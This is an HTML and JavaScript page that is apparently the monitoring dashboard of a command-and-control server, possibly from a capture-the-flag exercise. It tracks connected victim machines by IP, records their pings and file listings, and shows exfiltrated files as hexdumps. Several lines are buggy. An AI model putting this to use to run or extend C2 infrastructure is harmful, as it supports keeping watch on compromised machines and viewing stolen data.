<!doctype html>
<html>
<head>
<script>
"use strict";
let es;
function connect_es() {
	es = new EventSource("./es");
}
connect_es();
const log = (msg) => {
	console.log(msg);
	raw_log_content.innerHTML += msg + "\n"; 
	raw_log_content.scrollTop = raw_log_content.scrollHeight;
}
es.onmessage = (evt) => {
	log("Unhandled:" + evt);
	console.dir(evt);
}

function hashCode2(str){
	let hash = 0;
	if (str.length == 0) return hash;
	for (let i = 0; i < str.length; i++) {
		char = str.charCodeAt(i);
		hash = ((hash<<5)-hash)+char;
		hash = hash & hash; // Convert to 32bit integer
	}
	return hash;
}

function hexdump(buffer, blockSize) {
    blockSize = blockSize || 16;
    var lines = [];
    var hex = "0123456789ABCDEF";
    for (var b = 0; b < buffer.length; b += blockSize) {
        var block = buffer.slice(b, Math.min(b + blockSize, buffer.length));
        var addr = ("0000" + b.toString(16)).slice(-4);
        var codes = block.split('').map(function (ch) {
            var code = ch.charCodeAt(0);
            return " " + hex[(0xF0 & code) >> 4] + hex[0x0F & code];
        }).join("");
        codes += "   ".repeat(blockSize - block.length);
        var chars = block.replace(/[\x00-\x1F\x20]/g, '.');
        chars +=  " ".repeat(blockSize - block.length);
        lines.push(addr + " " + codes + "  " + chars);
    }
    return lines.join("\n");
}

function unhex(hs) {
	if(hs.length % 2 == 1) hs = "0" + hs;
	return unescape(hs.replace(/(..)/g,"%$1"));
}

function hex(s) {
	return Array.from(s).map(c => ("00" + c.charCodeAt(0).toString(16)).slice(-2)).join('')
}

const connections = new Map();
const clients = new Map();

let selected_client = null;

function select_client(cl) {
	document.querySelectorAll(".client.selected").forEach(a => a.classList.remove("selected"));
	document.querySelector("#client_info_zone").removeChild(document.querySelector("#client_info_zone > div"));

	cl.el.classList.add("selected");
	selected_client = cl;
	document.querySelector("#client_info_zone").appendChild(cl.details_el);
}

function select_file(fname, client) {
	document.querySelectorAll(".files .selected").forEach(a => a.classList.remove("selected"));
	client.details_el.querySelector(`.file_${hex(fname)}`).classList.add("selected");

	if(client.files.get(fname) == null) {
		document.querySelector("#hexdump_content").innerHTML = `File: ${fname}<br/>&lt;This file hasn't been uploaded yet&gt;`;
	} else {
		document.querySelector("#hexdump_content").innerHTML = `File: ${fname}<br/>${hexdump(client.files.get(fname))}`;
	}
}

class Client {
	constructor(conn) {
		this.ip = conn.ip;
		this.ping_ids = new Set();
		this.lastSeen = Date.now();
		this.exfil_queue = [];
		this.files = new Map();
		const el = document.createElement("li");
		el.onclick = _ => select_client(this);
		el.classList.add("client");
		el.innerHTML = this.ip;

		client_list.insertBefore(el, client_list.firstChild);
		this.el = el;

		// God damn React was made for this
		const del = document.createElement("div");
		del.innerHTML = `
IP: ${this.ip}<br/>
Instance IDs: <ul class="ids"></ul><br/>
Files: <ul class="files"></ul>
		`;
		this.details_el = del;
	}

	ping(payload) {
		this.lastSeen = Date.now();
		const dids = this.details_el.querySelector(".ids");
		if(!this.ping_ids.has(payload)) {
			this.ping_ids.add(payload);
			const lel = document.createElement("li");
			lel.classList.add(`id_${payload}`);
			lel.innerText = payload;
			dids.appendChild(lel);
		}

		const did = dids.querySelector(`.id_${payload}`);
		did.classList.add("fresh");
		setTimeout(_=>did.classList.remove("fresh"), 1);

		this.el.innerHTML = this.ip + "/" + Array.from(this.ping_ids).map(pp=>pp.slice(0,10)).join(",")
		client_list.insertBefore(client_list.removeChild(this.el), client_list.firstChild);

	}

	addFile(filename) {
		if(this.files.has(filename)) return;
		this.files.set(filename, null);

		const fs = this.details_el.querySelector(".files");
		const fnames = Array.from(fs.querySelectorAll("li")).map(e => e.innerText);
		if(!fnames.includes(filename)) {
			const fel = document.createElement("li");
			fel.classList.add("file_" + hex(filename));
			fel.classList.add("notyet");
			fel.innerText = filename;
			fel.onclick = _ => select_file(filename, this);
			fs.appendChild(fel);
		}
	}

	askFile(filename) {
		this.exfil_queue.push(filename);
	}

	exfil(file_data) {
		let fn;
		if(this.exfil_queue.length == 1) {
			this.files.set(fn=this.exfil_queue.pop(), file_data);
		} else {
			this.files.set(fn="orphan_" + hashCode2(file_data), file_data);
			this.exfil_queue.clear();
		}
		this.details_el.querySelector(".files .file_"+hex(fn)).classList.remove("notyet");
	}
}

class Connection {
	constructor(fd, ip) {
		this.fd = fd;
		this.ip = ip;

		if(ip in clients) {
			this.client = clients[ip];
		} else {
			this.client = clients[ip] = new Client(this);
		}
	}
}

es.onerror = connect_es;
es.addEventListener("status", e => log("[STATUS] " + e.data));
es.addEventListener("win", e => log("[WIN] " + e.data));
es.addEventListener("ping", e => {
	const E = JSON.parse(e.data);
	console.assert(connections[E.fd] instanceof Connection);
	connections[E.fd].client.ping(E.payload_hex);
});
es.addEventListener("listing_file", e => {
	const E = JSON.parse(e.data);
	connections[E.fd].client.addFile(unhex(E.filename_hex));
});
es.addEventListener("listing_ask", e => {
	const E = JSON.parse(e.data);
	connections[E.fd].client.askFile(unhex(E.filename_hex));
});
es.addEventListener("exfil", e => {
	const E = JSON.parse(e.data);
	connections[E.fd].client.exfil(unhex(E.data));
});
es.addEventListener("bad_opcode", e => log("[BAD_OPCODE] " + e.data));
es.addEventListener("disconnect", e => {
	const E = JSON.parse(e.data);
	delete connections[E.fd];
});
es.addEventListener("connect", e => {
	const E = JSON.parse(e.data);
	console.assert(connections[E.fd] === undefined);
	connections[E.fd] = new Connection(E.fd, E.ip);
});

function mon_ping_timeout_fn() {
	document.querySelector("#status").classList.add("bad");
	document.querySelector("#status").innerHTML = "STATUS: LOST CONNECTION";
}

let mon_ping_timeout = setTimeout(mon_ping_timeout_fn, 1500);
es.addEventListener("mon_ping", _ => {
	document.querySelector("#status").classList.remove("bad");
	document.querySelector("#status").innerHTML = "STATUS: OPERATIONAL";
	clearTimeout(mon_ping_timeout);
	mon_ping_timeout = setTimeout(mon_ping_timeout_fn, 1500);
});

</script>
<style>
body {
	background-color: black;
	color: #0f0;
	font-family: monospace;
	font-size: 1.2rem;

	display: grid;
	grid-template-areas: "banner status empty" "raw raw raw" "clients details file";
	grid-template-columns: 50ch 1fr 70ch;
	grid-gap: 3rem;

	margin: 5rem;
}
* {
	box-sizing: border-box;
}
ul {
	list-style: none;
	padding: 0;
}
@keyframes client_fade {
	from {
		box-shadow: -2ex 0 #0f0;
	} to {
		box-shadow: -2ex 0 #620;
	}
}

.client, .ids li {
	position: relative;
	box-sizing: border-box;
	background-color: #000;
	box-shadow: -2ex 0 #0f0;
	margin-left: 2ex;
	padding-left: 1ex;
	border: 1px solid black;
}

.client, .files li {
	cursor: pointer;
}

.client:not(.fresh), .ids li:not(.fresh) {
	animation-name: client_fade;
	animation-duration: 2s;
	animation-delay: 6s;	/* 5s timer on the victim + 1s worst case most time the server could buffer the packets */
	animation-fill-mode: both;
}

li {
	white-space: nowrap;
	overflow: hidden;
	text-overflow: ellipsis;
}

li.selected {
	color: white;
	border: 1px solid white;
}

.files li.notyet {
	color: #080;
}

.title {
	font-size: 2em;
	margin-bottom: 1rem;
	display: inline-block;
}

#raw_log {
	grid-area: raw;
}

#raw_log_content {
	all: unset;
	height: 10em;
	width: 100%;
	overflow-wrap: break-all;
	white-space: pre-wrap;
	overflow-y: auto;
	border: 1px solid #0f0;
	padding: 0.5em;
	box-sizing: border-box;
	margin-top: 1rem;
}

#banner {
	grid-area: banner;
}

#status {
	grid-area: status;
	font-size: 2rem;
	display: flex;
	align-items: center;
}

@keyframes color_red_orange {
	from {color: red;} to {color: orange;}
}

.bad#status {
	font-weight: bold;
	animation: color_red_orange;
	animation-direction: alternate;
	animation-duration: .5s;
	animation-iteration-count: 9999;
}

#clients {
	grid-area: clients;
}

#client_info_zone {
	grid-area: details;
	overflow-x: hidden;
	overflow-y: auto;
}

#client_info_zone > div {
	overflow-wrap: break-word;
}

#hexdump {
	grid-area: file;
}

#hexdump_content {
	white-space: pre;
}

</style>
</head>
<body>
<pre id="banner">
  QQQQ   UU  UU   AAAA    CCCC   KK  KK
 QQ  QQ  UU  UU  AA  AA  CC  CC  KK KK 
 QQ  QQ  UU  UU  AAAAAA  CC      KKKK  
 QQ QQQ  UU  UU  AA  AA  CC  CC  KK KK 
  QQQQQQ  UUUU   AA  AA   CCCC   KK  KK
      QQQ                              
          QUACK THE QUACKERS C2 MONITOR
</pre>
<pre id="status">STATUS: OPERATIONAL</pre>
<div id="raw_log">
	<span class="title">Raw Logs</span>
	<textarea id="raw_log_content" readonly></textarea>
</div>
<div id="clients">
	<span class="title">Clients</span>
	<ul id="client_list"></ul>
</div>
<div id="client_info_zone">
	<span class="title">Client</span>
	<div></div>
</div>
<div id="hexdump">
	<span class="title">Hexdump</span>
	<div id="hexdump_content"></div>
</div>
</body>
</html>
